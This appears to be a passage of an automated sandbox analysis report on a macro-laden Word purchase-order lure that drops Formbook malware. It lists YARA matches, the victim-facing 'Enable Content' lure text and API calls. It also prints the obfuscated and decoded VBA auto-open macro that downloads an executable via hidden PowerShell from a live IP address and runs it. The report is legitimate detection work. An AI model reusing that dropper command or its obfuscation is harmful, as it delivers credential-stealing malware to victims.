Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 4	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital Page1 of 1 Owords It? O
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Screenshot number: 8	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 8	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital k L Owords It? O Type h

Document contains an embedded VBA macro which may execute processes

Show sources

Source: RFL_PO 69002.doc	OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe")

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: RFL_PO 69002.doc	OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))

Source: C:\Users\Public\Documents\nothinglittle.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419D60 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E10 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E90 NtClose,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419D5A NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E8B NtClose,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419F3A NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CB040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9540 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C95F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9760 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA770 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C97A0 NtUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9650 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C96D0 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C99D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9840 NtDelayExecution,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C98A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C98F0 NtReadVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A20 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CAD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9FE0 NtCreateMutant,

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_030217B0
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021785
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021C18
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021C28
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DF528
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DA4A8
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D0006
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D0040
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DEEA0
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D6B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00401030
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D8BA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D988
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041E2F2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_004012FB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DA9E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402D88
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DE31
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00409E3B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D719
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CFA3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CFA6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DFB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129C1C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341002
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013520A8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B090
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134231B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A3360
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126337D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01263382
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013403DA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126225E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013522AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013532A9
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134E2C5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013525DD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2430
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129841F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134D466
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012694B8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013467E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134D616
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128F900
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2990
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135E824
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012888E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013528EC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AAB40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0132CB4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BEBB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AEB9A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0132EB8A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012D8BE8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134DBD2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BABD8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133FA2B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01345A4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344AEF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01280D20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352D07
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351D55
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2D50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01342D82
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134CC77
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4CD4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351FF1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135DFCE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A6E30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0130AE60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01331EB6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352EF7

Source: RFL_PO 69002.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open

Source: RFL_PO 69002.doc

OLE indicator, VBA macros: true

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 0128B150 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 012DD08C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 01315720 appears 85 times

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
